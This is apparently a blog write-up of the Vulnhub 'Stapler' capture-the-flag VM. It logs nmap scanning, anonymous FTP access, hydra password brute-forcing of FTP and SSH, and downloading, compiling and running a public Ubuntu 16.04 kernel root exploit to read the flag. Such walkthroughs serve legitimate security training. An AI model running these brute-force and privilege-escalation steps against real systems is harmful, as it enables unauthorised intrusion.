Stapler CTF VM — Vulnhub.com

netdiscover -r (ip range) found the VM ip address.

nmap (ip range) found:
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql

root@kali:~#ftp (ip range)
Connected to 192.168.1.104.
220-
220-| — — — — — — — — — — — — — — — — — — — — — — — — — — — — — –|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-| — — — — — — — — — — — — — — — — — — — — — — — — — — — — — –|
220-
220 
Name (192.168.1.104:root):

it seems like the box allows Anonymous FTP logins

Name (192.168.1.104:root): Anonymous
(and then just entered through the password). 
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

ftp>ls

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r–r– 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.

ftp> get note

local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (293.5174 kB/s)

ftp> exit

root@kali:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

(THIS GIVES US A FEW USER NAMES TO THINK ABOUT)

HARRY
JOHN
ELLY

Think this is all we can get from the FTP port so lets move on and try the ssh (we dont have the password for this yet but it’s worth a try).

ssh (ip range)
 — — — — — — — — — — — — — — — — — — — — — –
~ Barry, don’t forget to put a message here ~
 — — — — — — — — — — — — — — — — — — — — — –
root@192.168.1.104’s password:

I didnt have the password but did get another user name to add to the list.

BARRY

Decided to try hydra on the ftp server with the user names that Ive found so far.

hydra -l elly -e nsr ftp://(ip range)

[21][ftp] host: 192.168.1.104 login: elly password: ylle

******** PASSWORD FOUND FOR USER elly ***********

logged back into the ftp server as elly and found the passwd file that i can use as usernames to work against.

I found this command on the IRC for the vm.

awk -F’:’ ’{ print $1}’ passwd > users

I used it to pull only the first data set from the passwd file so I ended up with a list of just the user names called users

cat users

root
daemon
bin
sys
sync
games
man
etc…………….

I used hydra to brute force the ssh login

I first ran this command

hydra -e nsr -l ./users ssh 192.168.1.132

but I got an error because the -l command is for a single user name not the list i specified. So i hydra -h and found out that -L is the command to load in a user name file. also the ssh part goes at the end of the command.

hydra -e nsr -L ./users 192.168.1.132 ssh

[22][ssh] host: 192.168.1.132 login: SHayslett password: SHayslett

******** PASSWORD FOUND FOR SSH CONNECTION ***********

ssh 192.1.168.132 -l SHayslett

Logged in as SHayslett

Lets take a look at what version Linux the box is running with the command

cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=“Ubuntu 16.04 LTS”

I then went to the exploit DB https://www.exploit-db.com/
searched for Ubuntu 16.04 and found 3 vulnerabilites.

Linux Kernel 4.4.0–2 (Ubuntu 16.04) — netfilter target_offset OOB Local Root Exploit
Linux Kernel 4.4.x (Ubuntu 16.04) — double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Linux Kernel (Ubuntu 16.04) — Reference Count Overflow Using BPF Maps

The second one is what I was looking for:
Linux Kernel 4.4.x (Ubuntu 16.04) — double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit

Reading the exploit and following the steps. I managed to get root access and found the flag. Below is the commands I used and the mistakes I made trying to get to exploit to work.

SHayslett@red:/$ ebpf_mapfd_doubleput$ ./compile.sh
bash: ebpf_mapfd_doubleput$:
command not found

SHayslett@red:/$ /ebpf_mapfd_doubleput$ ./compile.sh
bash: /ebpf_mapfd_doubleput$:
No such file or directory

SHayslett@red:/$ wget https://www.exploit-db.com/download/39772
–2016–07–13 16:19:03– https://www.exploit-db.com/download/39772
Resolving
www.exploit-db.com (www.exploit-db.com)… 192.124.249.8
Connecting to
www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5367 (5.2K) [application/txt]
39772: Permission denied

Cannot write to ‘39772’ (Success).

I thought I had it at this point but wasn’t sure as the “Cannot write to ‘39772’ didn’t fill me with confidence.

I headed back over the exploits-db page and saw that there was a mirror of the file at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

So i re-ran the commands using the mirror address.

SHayslett@red:/$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
–2016–07–13 16:22:15– https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)… 192.30.253.112
Connecting to github.com (github.com)|192.30.253.112|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location:
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
–2016–07–13 16:22:15–
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7115 (6.9K) [application/zip]
39772.zip: Permission denied

Cannot write to ‘39772.zip’ (Success).

Again I thought I had it sorted so decided to change directory into the /tmp folder to see if the download had worked

SHayslett@red:/$ cd tmp
SHayslett@red:/tmp$ ls

asdf.py vmware-root

Nope!!!! I was stuck at this point so as a last ditch attempt before moving on and trying something different I decided to run the commands again whilst in the /tmp folder

SHayslett@red:/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
–2016–07–13 16:24:51– https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)… 192.30.253.112
Connecting to github.com (github.com)|192.30.253.112|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location:
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
–2016–07–13 16:24:51–
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.16.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.16.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘39772.zip’

39772.zip 100%[===================>] 6.95K –.-KB/s in 0s

2016–07–13 16:24:51 (30.0 MB/s) — ‘39772.zip’ saved [7115/7115]

BOOM!! It worked, I’ll try to remember this for future use.

SHayslett@red:/tmp$ unzip *
Archive: 39772.zip
caution: filename not matched: asdf.py
caution: filename not matched: vmware-root

SHayslett@red:/tmp$ unzip 39772.zip 
Archive: 39772.zip
 creating: 39772/
 inflating: 39772/.DS_Store 
 creating: __MACOSX/
 creating: __MACOSX/39772/
 inflating: __MACOSX/39772/._.DS_Store 
 inflating: 39772/crasher.tar 
 inflating: __MACOSX/39772/._crasher.tar 
 inflating: 39772/exploit.tar 
 inflating: __MACOSX/39772/._exploit.tar

SHayslett@red:/tmp$ cd 39772

SHayslett@red:/tmp/39772$ ls
crasher.tar exploit.tar

SHayslett@red:/tmp/39772$ tar xf exploit.tar 
SHayslett@red:/tmp/39772$ ls

SHayslett@red:cd /ebpf_mapfd_doubleput_exploit

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘make_setuid’:

doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
 .insns = (__aligned_u64) insns,
 ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
 .license = (__aligned_u64)”“
 ^

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you’ll have a root shell in <=60 seconds.
suid file detected, launching rootshell…
we have root privs now…

***** WooHoo we have root access *****

From here getting the flag was easy.

root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root

root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql

root@red:/root# cat flag.txt

b6b545dc11b7a270f4bad23432190c75162c4a2b

That was a really nice and pretty easy CTF. I would highly recommend it to anyone who has a few hours spare.

Huge thanks as always to g0tmilk for creating the VM and for vulnhub.com for hosting this and all the other amazing VM’s on their site.


Originally published at pentestingandctf.tumblr.com.